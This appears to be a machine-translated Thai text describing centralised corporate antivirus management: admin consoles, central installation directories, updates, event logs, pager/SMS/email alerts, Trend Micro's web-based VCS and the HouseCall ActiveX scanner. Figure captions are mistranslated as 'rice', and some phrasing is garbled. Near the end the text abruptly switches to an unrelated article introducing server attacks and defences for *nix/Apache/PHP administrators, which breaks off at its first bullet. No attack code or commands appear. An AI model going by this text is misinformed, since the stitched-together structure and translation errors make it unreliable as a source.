อินเทอร์เฟซผู้ใช้ของคอนโซลการจัดการช่วยให้คุณสามารถดูโครงสร้างแบบทรีของเครือข่ายองค์กร เข้าถึงคอมพิวเตอร์แต่ละเครื่องของกลุ่มผู้ใช้หรือโดเมนบางเครื่องได้ (รูปที่ 4-2) หากจำเป็น

ข้าว. 4-2. คอนโซลการจัดการของผู้ดูแลระบบป้องกันไวรัส

เนื่องจากเครือข่ายองค์กรสามารถมีได้อย่างกว้างขวาง ด้วยคอมพิวเตอร์หลายพันเครื่องในหลายร้อยโดเมน คอนโซลจึงต้องไม่เพียงแต่ให้มุมมองแบบต้นไม้เครือข่ายเท่านั้น แต่ยังต้องค้นหาเวิร์กสเตชันโดยตรงด้วยชื่อ เวิร์กกรุ๊ปของผู้ใช้ หรือโดเมนด้วย

สำหรับองค์ประกอบส่วนต่อประสานผู้ใช้ที่เหลือ กล่องโต้ตอบทั่วไปที่มีการควบคุมมาตรฐานหรือที่ออกแบบมาเป็นพิเศษจะใช้ที่นี่ - ปุ่ม รายการ ช่องกาเครื่องหมาย ช่องป้อนข้อความ ฯลฯ

ขั้นตอนการติดตั้งเบื้องต้น

ผู้ดูแลระบบต่อต้านไวรัสเปิดตัวโปรแกรมการติดตั้งสำหรับรีโมทคอนโทรลและคอนโซลการตรวจสอบ ซึ่งดำเนินการอื่น ๆ ทั้งหมดที่เกี่ยวข้องกับการติดตั้ง อัปเดต และการทำงานของระบบป้องกันไวรัส โดยเฉพาะอย่างยิ่ง เซิร์ฟเวอร์ป้องกันไวรัสได้รับการติดตั้งบนหนึ่งในเซิร์ฟเวอร์เครือข่ายขององค์กร ซึ่งทำหน้าที่ประสานงานและควบคุม

ในเครือข่ายขนาดเล็ก ผู้ดูแลระบบสามารถใช้คอนโซลเพื่อสร้างไดเร็กทอรีการติดตั้งโปรแกรมป้องกันไวรัสแบบรวมศูนย์บนเซิร์ฟเวอร์เครือข่ายภายใน จากนั้นเริ่ม (หรือเตรียมงานสำหรับการเปิดใช้ล่าช้า) กระบวนการติดตั้งโปรแกรมป้องกันไวรัสบนเครือข่ายเวิร์กสเตชันและเซิร์ฟเวอร์ทั้งหมด

ในเครือข่ายของบริษัทขนาดใหญ่ที่มีสำนักงานสาขาระยะไกล ผู้ดูแลระบบจะใช้คอนโซลเพื่อสร้างไดเรกทอรีการติดตั้งแบบรวมศูนย์หลายไดเรกทอรี (เช่น หนึ่งไดเรกทอรีสำหรับเครือข่ายระยะไกลแต่ละเครือข่าย) ถัดไป ผู้ดูแลระบบเตรียมงานสำหรับการติดตั้งโปรแกรมป้องกันไวรัสบนเวิร์กสเตชันเครือข่ายทั้งหมด การติดตั้งจะดำเนินการในแต่ละสาขาระยะไกลจากไดเร็กทอรีการติดตั้งแบบรวมศูนย์ ซึ่งช่วยลดการรับส่งข้อมูลเครือข่ายระหว่างสาขา เพื่อลดเวลาในการติดตั้ง โปรแกรมป้องกันไวรัสจะถูกติดตั้งบนเวิร์กสเตชันทั้งหมดพร้อมกัน

การอัพเดตฐานข้อมูลแอนติไวรัสและแอนติไวรัส

การดำเนินการนี้ดำเนินการโดยผู้ดูแลระบบการป้องกันไวรัสจากเวิร์กสเตชันของเขาโดยใช้คอนโซลการจัดการและการควบคุม

หากมีการสร้างไดเร็กทอรีการติดตั้งแบบรวมศูนย์หลายไดเร็กทอรี ผู้ดูแลระบบจะกำหนดค่าการจำลองแบบของพวกเขา หากจำเป็นต้องอัปเดตโมดูลโปรแกรมป้องกันไวรัสหรือฐานข้อมูลป้องกันไวรัส ผู้ดูแลระบบจะอัปเดตเนื้อหาเพียงรายการเดียว นั่นคือไดเร็กทอรีหลักของการติดตั้งแบบรวมศูนย์ เนื้อหาของไดเร็กทอรีที่จำลองแบบจะได้รับการอัปเดตโดยอัตโนมัติตามกำหนดการที่กำหนดไว้ล่วงหน้า

โปรดทราบว่าหากเครือข่ายขององค์กรเชื่อมต่อกับอินเทอร์เน็ต เนื้อหาของไดเร็กทอรีหลักของการติดตั้งแบบรวมศูนย์สามารถอัปเดตได้โดยอัตโนมัติจากไซต์ของ บริษัท ป้องกันไวรัสตามกำหนดการที่ผู้ดูแลระบบกำหนด หากไม่มีการเชื่อมต่อดังกล่าว ผู้ดูแลระบบต้องอัพเดตไดเร็กทอรีต้นแบบการติดตั้งแบบรวมศูนย์ด้วยตนเอง

การจัดการการทำงานของโปรแกรมป้องกันไวรัส

ผู้ดูแลระบบป้องกันไวรัสสามารถกำหนดค่าโหมดการทำงานของโปรแกรมป้องกันไวรัสที่ติดตั้งบนเวิร์กสเตชันและเซิร์ฟเวอร์จากเวิร์กสเตชันจากระยะไกลได้โดยใช้คอนโซลการจัดการและควบคุมแบบรวมศูนย์ ตลอดจนกำหนดโหมดการทำงานของบริการระบบป้องกันไวรัส

การใช้บัญชีที่กำหนดไว้ล่วงหน้าในโดเมนองค์กรตั้งแต่หนึ่งโดเมนขึ้นไป คอนโซลสามารถเชื่อมต่อกับตัวแทนที่ทำงานบนคอมพิวเตอร์ทุกเครื่องในเครือข่าย เมื่อใช้อินเทอร์เฟซหน้าต่างมาตรฐาน ผู้ดูแลระบบสามารถเปลี่ยนการตั้งค่าใดๆ สำหรับโปรแกรมป้องกันไวรัสที่ติดตั้งในคอมพิวเตอร์บางเครื่อง สำหรับกลุ่มผู้ใช้ที่เลือก หรือสำหรับโดเมนที่เลือก การเปลี่ยนแปลงพารามิเตอร์สามารถทำได้ทันทีหรือแสดงเป็นงานที่เริ่มต้นในเวลาที่กำหนด

นอกจากนี้ ผู้ดูแลระบบสามารถกำหนดตารางเวลาสำหรับการตรวจสอบการป้องกันไวรัสโดยการสแกนไดเรกทอรีของเวิร์กสเตชันและเซิร์ฟเวอร์

การรวบรวมและดูข้อมูลเกี่ยวกับการทำงานของการป้องกันไวรัส

ระบบควบคุมและติดตามระยะไกลช่วยให้มั่นใจถึงการรวบรวม บันทึก และดูข้อมูลเกี่ยวกับการทำงานของการป้องกันไวรัส โมดูลเซิร์ฟเวอร์ของระบบป้องกันไวรัสที่ติดตั้งบนหนึ่งในเซิร์ฟเวอร์เครือข่ายขององค์กร (ผู้ดูแลระบบเลือกเซิร์ฟเวอร์นี้) มีหน้าที่ในการรวบรวมข้อมูลจากส่วนกลาง

ข้อมูลที่รวบรวมทั้งหมดจะพร้อมใช้งานผ่านคอนโซลโปรแกรมควบคุมบนเวิร์กสเตชันของผู้ดูแลระบบการป้องกันไวรัส

ในรูป 4-3 เราได้แสดงขั้นตอนการถ่ายโอนข้อมูลจากบันทึกในเครื่องของโปรแกรมป้องกันไวรัสที่ติดตั้งบนเวิร์กสเตชันและเซิร์ฟเวอร์เครือข่ายไปยังบันทึกทั่วไปที่อยู่บนเซิร์ฟเวอร์ป้องกันไวรัส นอกจากนี้ยังแสดงให้เห็นว่าผู้ดูแลระบบป้องกันไวรัสสามารถดูบันทึกทั่วไปจากเวิร์กสเตชันของเขาโดยใช้คอนโซล

ข้าว. 4-3. คอนโซลการจัดการของผู้ดูแลระบบป้องกันไวรัส

ข้อมูลต่อไปนี้อยู่ภายใต้การรวบรวมและการบันทึก:

• เวลาและวันที่ติดตั้ง/อัปเดตโมดูลโปรแกรมป้องกันไวรัส ระบุเวอร์ชันของโมดูลเหล่านี้
• เวลาและวันที่อัปเดตฐานข้อมูลต่อต้านไวรัสโดยระบุเวอร์ชัน
• ข้อมูลเกี่ยวกับเวอร์ชันของระบบปฏิบัติการที่ติดตั้งบนเวิร์กสเตชันและเซิร์ฟเวอร์เครือข่าย ประเภทของโปรเซสเซอร์ ตำแหน่งของไดเร็กทอรีระบบปฏิบัติการ ฯลฯ
• ข้อมูลเกี่ยวกับรุ่นป้องกันไวรัสที่ติดตั้งบนเวิร์กสเตชันและเซิร์ฟเวอร์เครือข่าย
• ข้อมูลเกี่ยวกับบัญชีที่ใช้ในเวิร์กสเตชันเพื่อเข้าถึงไดเร็กทอรีการติดตั้งแบบรวมศูนย์เพื่อติดตั้งหรืออัปเดตฐานข้อมูลการป้องกันไวรัสและไวรัส
• ข้อมูลเกี่ยวกับตำแหน่งของไดเร็กทอรีการติดตั้งแบบรวมศูนย์ที่ใช้ในการติดตั้งหรืออัพเดตฐานข้อมูลแอนติไวรัสและแอนติไวรัส
• ข้อมูลเกี่ยวกับเส้นทางแบบเต็มไปยังไฟล์บันทึกในเครื่องที่อยู่บนเวิร์กสเตชันและเซิร์ฟเวอร์เครือข่าย และเนื้อหา
• ข้อมูลเกี่ยวกับบัญชีที่คอนโซลการจัดการใช้เพื่อเข้าถึงทรัพยากรของเวิร์กสเตชันและเซิร์ฟเวอร์เครือข่ายเมื่อทำการติดตั้ง อัปเดตโปรแกรมป้องกันไวรัสและฐานข้อมูลป้องกันไวรัส ตลอดจนเมื่อได้รับข้อมูลเกี่ยวกับการทำงานของโปรแกรมป้องกันไวรัส
• การกำหนดค่าแอนติไวรัสและโหมดการทำงาน (การใช้วิธีการฮิวริสติก รายการประเภทไฟล์ที่สแกน การดำเนินการที่ต้องทำเมื่อตรวจพบไวรัส ฯลฯ)
• ข้อมูลที่เกี่ยวข้องกับการทำงานของโปรแกรมป้องกันไวรัส เช่น ชื่อของไวรัสที่ตรวจพบ วันที่ตรวจพบ การดำเนินการ ผลการรักษา เป็นต้น

ข้อมูลที่ได้รับจะถูกเขียนลงในบันทึกระบบของเซิร์ฟเวอร์ที่รับผิดชอบในการรวบรวมข้อมูลเกี่ยวกับการทำงานของระบบป้องกันไวรัสจากส่วนกลาง

เมื่อใช้คอนโซลการจัดการ ผู้ดูแลระบบสามารถรับรายงานแบบตารางได้หลากหลาย และแปลงเป็นรูปแบบ Microsoft Excel หากจำเป็น สิ่งเหล่านี้อาจเป็นรายงานเช่น:

• รายงานเกี่ยวกับการติดตั้งหรืออัพเดตฐานข้อมูลแอนตี้ไวรัสและแอนติไวรัส
• รายงานการตรวจหาไวรัสบนเวิร์กสเตชันที่เลือก บนเวิร์กสเตชันของกลุ่มผู้ใช้และโดเมน
• รายงานที่อนุญาตให้คุณติดตามเวลาและทิศทางของการแพร่กระจายของไวรัสบางชนิด
• รายงานการใช้บัญชีที่ออกแบบมาเพื่อจัดการการทำงานของระบบป้องกันไวรัส
• รายงานการเปลี่ยนแปลงในการตั้งค่าและโหมดการทำงานของระบบป้องกันไวรัส

สัญญาณแจ้ง

เมื่อโปรแกรมป้องกันไวรัสพบไฟล์ที่ติดไวรัสบนเวิร์กสเตชันของผู้ใช้ระหว่างการสแกนซึ่งเป็นส่วนหนึ่งของงานหรือเริ่มต้นโดยโปรแกรมตรวจสอบไวรัส โปรแกรมจะแจ้งให้ผู้ใช้ทราบ (โดยแสดงข้อความบนหน้าจอเวิร์กสเตชันของเขา) และ เซิร์ฟเวอร์ป้องกันไวรัส

ถัดไป เซิร์ฟเวอร์ป้องกันไวรัสจะแจ้งผู้ดูแลระบบการป้องกันและบุคคลอื่นเกี่ยวกับเหตุการณ์ที่เกิดขึ้นตามการตั้งค่าที่ระบุระหว่างการติดตั้งระบบป้องกันไวรัส ในกรณีนี้ เซิร์ฟเวอร์ป้องกันไวรัสจะส่งข้อความผ่านเครือข่ายองค์กรและ (หากผู้ดูแลระบบระบุ) ผ่านเครือข่ายเพจ อีเมล หรือเครือข่าย SMS (รูปที่ 4-4)

นอกจากนี้ ข้อความเกี่ยวกับเหตุการณ์ที่เกิดขึ้นจะถูกเขียนลงในบันทึกหลักที่อยู่บนเซิร์ฟเวอร์ป้องกันไวรัส

ด้วยความช่วยเหลือของคอนโซลการจัดการ ผู้ดูแลระบบป้องกันไวรัสสามารถกำหนดรายการเหตุการณ์ ซึ่งจะต้องรายงานให้ผู้ใช้และผู้ดูแลระบบทราบโดยด่วน สิ่งเหล่านี้อาจเป็นได้ ตัวอย่างเช่น เหตุการณ์เช่น:

• การตรวจหาไวรัส
• ไม่สามารถอัปเดตโมดูลซอฟต์แวร์ของฐานข้อมูลต่อต้านไวรัสหรือไวรัสได้สำเร็จ
• ข้อผิดพลาดในการทำงานของซอฟต์แวร์ป้องกันไวรัส (โดยเฉพาะอย่างยิ่งที่อาจนำไปสู่การปิดระบบป้องกันไวรัสฉุกเฉิน)
• ความเป็นไปไม่ได้ของการบันทึกเหตุการณ์ในเครื่องเนื่องจากการล้นของบันทึกเหตุการณ์ในเครื่องหรือด้วยเหตุผลอื่น
• การเปลี่ยนแปลงในการกำหนดค่าและโหมดการทำงานของโปรแกรมป้องกันไวรัสที่อาจลดระดับหรือความน่าเชื่อถือของการป้องกัน

อาจมีการส่งข้อความเกี่ยวกับเหตุการณ์ดังกล่าวขึ้นอยู่กับการตั้งค่าที่ทำโดยผู้ดูแลระบบ

• ผู้ใช้ที่เวิร์กสเตชันเกิดเหตุการณ์ (เช่น ตรวจพบไวรัส)
• ผู้ดูแลระบบตั้งแต่หนึ่งคนขึ้นไปที่รับผิดชอบในการทำงานของเครือข่ายหรือสำหรับการดำเนินงานของการป้องกันไวรัส
• หัวหน้าบริษัทหรือบุคคลอื่นใดที่ผู้ดูแลระบบเป็นผู้กำหนด

ข้าว. 4-4. การส่งข้อความเกี่ยวกับการติดไวรัสไปยังเวิร์กสเตชัน

ข้อความถูกส่งโดยวิธีการออกอากาศมาตรฐานของระบบปฏิบัติการ (ข้อความของข้อความที่ส่งในลักษณะนี้จะปรากฏบนหน้าจอของผู้รับในกล่องโต้ตอบขนาดเล็ก) และโดยวิธีการเพิ่มเติมตามรายการด้านล่าง:

• ผ่านอีเมลโดยใช้โปรโตคอล SMTP
• ผ่านบริการเมล MHS (บนเครือข่าย NetWare);
• ไปยังเพจเจอร์ตัวอักษรและตัวเลขตั้งแต่หนึ่งรายการขึ้นไปโดยใช้ Alphanumeric Input Protocol (IXO/TAP) หรือเพจเจอร์ดิจิทัล
• ผ่านระบบข้อความสั้น SMS

โปรแกรมคอนโซลคำสั่งและควบคุมช่วยให้คุณสามารถกำหนดข้อความต่างๆ ให้กับเหตุการณ์ได้ ดังนั้นผู้ดูแลระบบสามารถกำหนดข้อความด้วยตนเองได้

โปรดทราบว่าในการส่งข้อความไปยังเพจเจอร์หรือส่งข้อความ SMS ระบบป้องกันไวรัสจะสื่อสารผ่านโมเด็มกับบริการที่เกี่ยวข้องที่ทำงานในโหมดอัตโนมัติ บริการเหล่านี้ไม่มีให้บริการทุกที่ ดังนั้นการส่งข้อความผ่านอีเมลจึงมีความหลากหลายมากกว่าการส่งข้อความไปยังเพจเจอร์หรือโทรศัพท์มือถือผ่าน SMS

ต้องใช้โมเด็มในการส่งข้อความไปยังบริการเพจจิ้งหรือบริการส่งข้อความ SMS อัตโนมัติ โมเด็มนี้สามารถเชื่อมต่อกับเซิร์ฟเวอร์ที่ทำหน้าที่เป็นศูนย์กลางในการรวบรวมและประมวลผลข้อมูลเกี่ยวกับการทำงานของการป้องกันไวรัส หรือกับคอมพิวเตอร์เครื่องอื่นในเครือข่ายองค์กร เมื่อกำหนดค่าระบบการส่งข้อความ ผู้ดูแลระบบต้องระบุว่าคอมพิวเตอร์เครื่องใดที่โมเด็มเชื่อมต่ออยู่

คุณสามารถใช้เซิร์ฟเวอร์อีเมลขององค์กรหรือเซิร์ฟเวอร์ที่โฮสต์โดยผู้ให้บริการอินเทอร์เน็ตเพื่อส่งข้อความผ่านอีเมล SMTP หากเครือข่ายท้องถิ่นเชื่อมต่อกับอินเทอร์เน็ตโดยใช้โมเด็ม ระบบจัดการและควบคุมการป้องกันไวรัสจะสร้างการเชื่อมต่อด้วยตัวเองโดยที่ผู้ให้บริการไม่ต้องดำเนินการใดๆ เพื่อส่งข้อความ

นอกจากนี้ยังมีเกตเวย์ต่างๆ บนอินเทอร์เน็ตที่อนุญาตให้ส่งข้อความอีเมลไปยังเพจเจอร์หรือโทรศัพท์มือถือ (เป็นข้อความ SMS) อย่างไรก็ตาม ควรสังเกตว่าเกตเวย์รัสเซียทั้งหมดทำงานในโหมดทดลอง ดังนั้นจึงไม่รับประกันการทำงานที่เชื่อถือได้

สำหรับเวลาที่จำเป็นสำหรับการส่งข้อความอีเมลผ่านเกตเวย์และเครือข่าย SMS ไปยังโทรศัพท์มือถือ การทดสอบภาคปฏิบัติได้แสดงให้เห็นว่าในกรุงมอสโกวจะแตกต่างกันไปตั้งแต่ไม่กี่วินาทีจนถึงหลายชั่วโมง

ระบบหลายระดับพร้อมเว็บอินเตอร์เฟส

สถาปัตยกรรมของระบบหลายระดับที่มีเว็บอินเตอร์เฟสเกี่ยวข้องกับการใช้เว็บเซิร์ฟเวอร์เป็นแกนหลักของระบบ งานของแกนกลางนี้คือ ด้านหนึ่ง องค์กรของการโต้ตอบแบบโต้ตอบแบบโต้ตอบกับผู้ใช้ และในทางกลับกัน ด้วยโมดูลซอฟต์แวร์ของระบบเฉพาะ

โปรดทราบว่าเทคโนโลยีเว็บในปัจจุบันมีการใช้กันอย่างแพร่หลายในการแก้ปัญหาการดูแลระบบ เช่น การตรวจสอบและวินิจฉัยอุปกรณ์เซิร์ฟเวอร์ขององค์กร การจัดการเซิร์ฟเวอร์อีเมล และอุปกรณ์และระบบอื่นๆ ที่เชื่อมต่อกับอินเทอร์เน็ตหรืออินทราเน็ตขององค์กร

ผู้ดูแลระบบหรือเจ้าหน้าที่ด้านวิศวกรรมสามารถขอรับข้อมูลการวินิจฉัยที่ครอบคลุมเกี่ยวกับการทำงานของฮาร์ดแวร์เซิร์ฟเวอร์ของ Compaq ได้โดยใช้เบราว์เซอร์ทั่วไป ซึ่งรวมถึงข้อมูลต่างๆ เช่น บันทึกข้อผิดพลาด ข้อความเกี่ยวกับความล้มเหลวของฮาร์ดแวร์ที่อาจเกิดขึ้น อุณหภูมิของ CPU อุณหภูมิภายในเคสและอุปกรณ์จ่ายไฟ ความเร็วพัดลม และอื่นๆ

ข้อดีของวิธีนี้คือการรวมวิธีต่างๆ เข้าด้วยกันเพื่อจัดการระบบเครือข่ายต่างๆ ตลอดจนไม่จำเป็นต้องติดตั้งโปรแกรมควบคุมหรือคอนโซลใดๆ บนเวิร์กสเตชันของผู้ดูแลระบบ นอกจากนี้ การบริหารสามารถทำได้จากคอมพิวเตอร์เครือข่ายใดๆ และหากเครือข่ายเชื่อมต่อกับอินเทอร์เน็ต จากนั้นจากที่ใดก็ได้ในโลกที่มีการเชื่อมต่ออินเทอร์เน็ตและคอมพิวเตอร์ที่มีเบราว์เซอร์

โปรโตคอล SSH หรือวิธีการอื่นๆ ที่คล้ายคลึงกัน (เช่น การแก้ไขความปลอดภัยดั้งเดิมของโปรโตคอล HTTP) ถูกใช้เพื่อปกป้องข้อมูลการควบคุมเมื่อส่งข้อมูลผ่านอินเทอร์เน็ตหรืออินทราเน็ตขององค์กร

เทรนด์สถาปัตยกรรมระบบควบคุมไวรัส

พิจารณาสถาปัตยกรรมของ Trend Virus Control System ที่สร้างขึ้นบนพื้นฐานของเทคโนโลยีเว็บ ระบบนี้ช่วยให้คุณจัดการและควบคุมการทำงานของระบบป้องกันไวรัสขององค์กรได้อย่างเต็มที่จากเวิร์กสเตชันหนึ่งผ่านเบราว์เซอร์ แม้ว่าชิ้นส่วนเครือข่ายแต่ละรายการจะอยู่ในประเทศต่างๆ หรือในทวีปต่างๆ ก็ตาม

เว็บเซิร์ฟเวอร์ ซึ่งโดยปกติคือ Microsoft Internet Information Server เวอร์ชัน 4.0 หรือ 5.0 ได้รับการติดตั้งบนหนึ่งในเซิร์ฟเวอร์เครือข่ายขององค์กร เซิร์ฟเวอร์นี้เป็นส่วนหนึ่งของระบบปฏิบัติการ Microsoft Windows 2000 Server และสามารถติดตั้งบนระบบปฏิบัติการ Microsoft Window NT เวอร์ชัน 4.0 จาก Microsoft Option Pack ที่ให้บริการฟรีสำหรับ Windows NT

แอปพลิเคชันเว็บเซิร์ฟเวอร์พิเศษ Trend VCS Server ที่ทำงานบนเว็บเซิร์ฟเวอร์นี้จะโต้ตอบกับโมดูลควบคุมและการตรวจสอบของระบบป้องกันไวรัส ตลอดจนตัวแทนซอฟต์แวร์ที่ติดตั้งในคอมพิวเตอร์เครือข่ายทั้งหมดที่ไม่มีอินเทอร์เฟซผู้ใช้ของตนเอง

การโต้ตอบดำเนินการโดยใช้โปรโตคอล HTTP ที่ปลอดภัยซึ่งพัฒนาโดย Trend Micro นอกจากนี้ การป้องกันด้วยรหัสผ่านยังใช้เพื่อจำกัดการเข้าถึงเซิร์ฟเวอร์ IIS และเซิร์ฟเวอร์ Trend VCS

ในรูป 4-5 เราได้แสดงบล็อกไดอะแกรมของระบบป้องกันไวรัสพร้อมเว็บอินเตอร์เฟส

ข้าว. 4-5. ระบบแอนตี้ไวรัสพร้อมเว็บอินเตอร์เฟส

วงจรนี้คล้ายกับวงจรที่แสดงในรูปที่ อย่างไรก็ตาม 4-1 ผู้ดูแลระบบการป้องกันไวรัสจะจัดการการทำงานผ่านเบราว์เซอร์ ไม่ใช่ผ่านแอปพลิเคชันคอนโซล

มีการติดตั้งโปรแกรมป้องกันไวรัส (PC-cillin, Server Protect, InterScan VirusWall, ScanMail ฯลฯ) บนเวิร์กสเตชัน โปรแกรมป้องกันไวรัสนี้ได้รับการจัดการโดยเซิร์ฟเวอร์ป้องกันไวรัสผ่านตัวแทน

เว็บเซิร์ฟเวอร์ Microsoft Internet Information Server ได้รับการติดตั้งบนคอมพิวเตอร์ทำหน้าที่เป็นเซิร์ฟเวอร์ป้องกันไวรัส เว็บแอปพลิเคชันพิเศษที่ทำงานบนเซิร์ฟเวอร์นี้จะจัดการเซิร์ฟเวอร์ป้องกันไวรัส นอกจากนี้ยังมีส่วนต่อประสานผู้ใช้สำหรับผู้ดูแลระบบสำหรับจัดการระบบป้องกันไวรัส

ตามคำร้องขอของผู้ดูแลระบบการป้องกันไวรัสซึ่งดำเนินการผ่านเบราว์เซอร์ แอปพลิเคชันนี้จะเริ่มการดำเนินการต่างๆ เช่น:

• สร้างไดเร็กทอรีการติดตั้งแบบรวมศูนย์
• การเตรียมและรันงานสำหรับการจำลองไดเร็กทอรีของการติดตั้งแบบรวมศูนย์
• การเตรียมและการเปิดตัวงานสำหรับการติดตั้งโมดูลซอฟต์แวร์ป้องกันไวรัสและฐานข้อมูลป้องกันไวรัส
• การกำหนดค่าโหมดการทำงานของโปรแกรมป้องกันไวรัสที่ติดตั้งบนเวิร์กสเตชันและเซิร์ฟเวอร์เครือข่ายขององค์กร
• แสดงบันทึกและรายงานประเภทต่างๆ ที่สะท้อนถึงการทำงานของระบบป้องกันไวรัส เช่นเดียวกับการปฏิบัติตามคำขอข้อมูลเกี่ยวกับรายงานเหล่านี้
• การควบคุมเวอร์ชันของระบบปฏิบัติการ โปรแกรมป้องกันไวรัส และฐานข้อมูลป้องกันไวรัสที่ติดตั้งในคอมพิวเตอร์เครือข่ายทั้งหมด

ดังนั้นในการจัดการเครื่องมือป้องกันไวรัสทั้งหมดที่ติดตั้งไว้ที่ใดก็ได้บนเครือข่ายองค์กร ผู้ดูแลระบบสามารถใช้เบราว์เซอร์ได้

เบราว์เซอร์นี้สามารถทำงานบนคอมพิวเตอร์เครื่องใดก็ได้ในเครือข่าย ดังนั้นจึงไม่จำเป็นต้องติดตั้งแอปพลิเคชันการดูแลระบบหรือแอปเพล็ต วิธีนี้ช่วยลดความยุ่งยากในการจัดการการทำงานของเครื่องมือป้องกันไวรัส เนื่องจากสามารถทำได้ไม่เฉพาะจากเวิร์กสเตชันของผู้ดูแลระบบเท่านั้น แต่ยังรวมถึงจากเวิร์กสเตชันเครือข่ายอื่นๆ ด้วย ตัวอย่างเช่น ในการเดินทางไปทำธุรกิจที่สาขาของบริษัทแห่งหนึ่ง ผู้ดูแลระบบสามารถควบคุมการทำงานของระบบป้องกันไวรัสได้อย่างเต็มที่ ราวกับว่าเขานั่งอยู่ที่โต๊ะทำงานในสำนักงานกลาง

เพื่อให้เป็นอิสระจากแพลตฟอร์มคอมพิวเตอร์มากที่สุด Trend VCS Server และแอปพลิเคชันไคลเอนต์จึงเขียนด้วยภาษาการเขียนโปรแกรม Java และภาษาอื่น ๆ ที่ใช้ในการพัฒนาเว็บแอปพลิเคชัน

สำหรับการแจ้งเตือนเกี่ยวกับเหตุการณ์ที่เกิดขึ้นในระบบป้องกันไวรัสขององค์กร การแจ้งเตือนดังกล่าวจะถูกส่งโดยโปรแกรมตัวแทนไปยัง Trend VCS Server และส่งทางอีเมล เครือข่ายเพจ ผ่านระบบ SMS เป็นต้น

ระบบ HouseCall

นอกจากการป้องกันไวรัสแบบคลาสสิกโดยใช้โปรแกรมป้องกันไวรัสที่ทำงานบนเวิร์กสเตชันแล้ว Trend Micro ยังมีเทคโนโลยีในการสแกนไฟล์เพื่อหาไวรัสโดยใช้ตัวควบคุม ActiveX ที่ออกแบบมาเป็นพิเศษสำหรับการป้องกันไวรัส

ตัวควบคุม ActiveX นี้อยู่บนเว็บเซิร์ฟเวอร์ขององค์กร และสามารถเข้าถึงได้ผ่านเบราว์เซอร์ เมื่อผู้ใช้ต้องการเริ่มการสแกนไวรัสสำหรับไฟล์หรือไดเร็กทอรีที่อยู่บนเวิร์กสเตชันของเขา เขาจะเปิดหน้าที่เกี่ยวข้องของเว็บเซิร์ฟเวอร์ของบริษัทโดยใช้เบราว์เซอร์ การดำเนินการนี้จะโหลดตัวควบคุม ActiveX ป้องกันไวรัสลงในหน่วยความจำของเวิร์กสเตชันของผู้ใช้โดยอัตโนมัติ

เมื่อการดาวน์โหลดเสร็จสิ้น ผู้ใช้สามารถโต้ตอบกับตัวควบคุม ActiveX ของแอนตี้ไวรัสผ่านหน้าต่างเบราว์เซอร์ โดยมีอินเทอร์เฟซผู้ใช้คล้ายกับโปรแกรมป้องกันไวรัสทั่วไป (รูปที่ 4-6)

การใช้ระบบ HouseCall นั้นง่ายมาก การใช้รายการไดเร็กทอรีแบบต้นไม้ คุณต้องเลือกไดเร็กทอรีและไฟล์ที่จะสแกนโดยทำเครื่องหมายในช่องที่เหมาะสม ถัดไป ให้คลิกปุ่ม SCAN หลังจากนั้นกระบวนการสแกนจะเริ่มขึ้น หากคุณเลือกช่อง Auto Clean เพิ่มเติม โปรแกรมจะพยายามลบเนื้อหาไวรัสออกจากไฟล์ที่ติดไวรัส

ผลการสแกนจะปรากฏในหน้าต่างแยกต่างหาก ผู้ใช้จะได้รับแจ้งให้พยายามลบเนื้อหาไวรัสออกจากไฟล์ที่ติดไวรัสหรือลบไฟล์ที่ติดไวรัส

ข้าว. 4-6. ระบบป้องกันไวรัส HouseCall

ข้อดีของวิธีนี้ ได้แก่ ไม่จำเป็นต้องติดตั้งโปรแกรมป้องกันไวรัสบนเวิร์กสเตชันของผู้ใช้ เมื่อผู้ใช้ต้องการตรวจสอบไฟล์ เขาเพียงแค่เปิดเบราว์เซอร์ โหลดหน้าเว็บไซต์ของบริษัทที่ต้องการลงไป และเริ่มการสแกน

สำหรับข้อเสีย เทคโนโลยีนี้ไม่ได้หมายความถึงการมีอยู่ของตัวตรวจสอบไวรัสที่ตรวจสอบไฟล์ทั้งหมดในเวลาที่มีการเข้าถึง ดังนั้นในความเห็นของเราจึงถือได้ว่าเป็นส่วนเพิ่มเติมเท่านั้น

โดยพื้นฐานแล้ว ระบบ HouseCall แตกต่างจากระบบตรวจสอบไวรัสที่สร้างบนเซิร์ฟเวอร์ DialogScience โดยพื้นฐานแล้ว แทนที่จะถ่ายโอนไฟล์ทีละไฟล์ไปยังเซิร์ฟเวอร์และตรวจสอบด้วยโปรแกรมป้องกันไวรัส ระบบ HouseCall จะติดตั้งโมดูลป้องกันไวรัสบนคอมพิวเตอร์ของผู้ใช้ในรูปแบบของตัวควบคุม ActiveX เมื่อดาวน์โหลดจากเซิร์ฟเวอร์ Trend Micro แล้ว โมดูลนี้สามารถสแกนไฟล์ทั้งหมดที่จัดเก็บไว้ในคอมพิวเตอร์ของผู้ใช้ได้เมื่อมีการร้องขอ ไฟล์เหล่านี้ไม่ได้ถูกถ่ายโอนทางอินเทอร์เน็ต แต่มีการตรวจสอบภายใน ดังนั้นกระบวนการนี้จึงใช้เวลาไม่นาน

ในบทความนี้ ฉันต้องการรวบรวมการโจมตีบางประเภทบนเซิร์ฟเวอร์และวิธีการป้องกันเซิร์ฟเวอร์จากแฮกเกอร์ มีการเขียนหนังสือและบทความเกี่ยวกับความปลอดภัยเป็นจำนวนมาก บทความนี้เน้นที่ข้อผิดพลาดพื้นฐานของผู้ดูแลระบบและแนวทางแก้ไขเพื่อขจัดข้อผิดพลาดเหล่านี้ หลังจากอ่านบทความนี้และตรวจสอบเซิร์ฟเวอร์ของตัวเองแล้ว แอดมินก็จะนอนไม่หลับอย่างสงบ เขาบอกได้แค่ว่าผ่าน "ผู้สมัครขั้นต่ำ" เท่านั้น

จำสุภาษิตสามผู้บริหาร
ไม่! ดีกว่าพิมพ์ออกมาและแขวนไว้ในที่ทำงานของคุณต่อหน้าต่อตาคุณ:
"ความปลอดภัยคือกระบวนการ",
"เมื่อแอดมินไม่มีอะไรทำก็ติดธุระ",
"ความปลอดภัยถูกกำหนดโดยลิงค์ที่อ่อนแอที่สุด"
บทความนี้มุ่งเป้าไปที่ผู้ดูแลระบบ *nix + Apache + PHP + Perl + (MySQL | PostgreSQL) และปกป้องเซิร์ฟเวอร์จากการโจมตีจากระยะไกล สำหรับผู้ดูแลระบบคนอื่นๆ ฉันหวังว่าบทความนี้จะเป็นประโยชน์ต่อความคิด
หนังสือต่างๆ มีการแบ่งประเภทของการโจมตีของแฮ็กเกอร์ที่แตกต่างกัน ฉันจะแนะนำการแบ่งของฉันออกเป็นสองคลาสตามเงื่อนไขของการโจมตีทั้งหมด แยกกลุ่มออก:

• โจมตีบริการที่มีช่องโหว่และเข้าถึงได้ทางอินเทอร์เน็ต

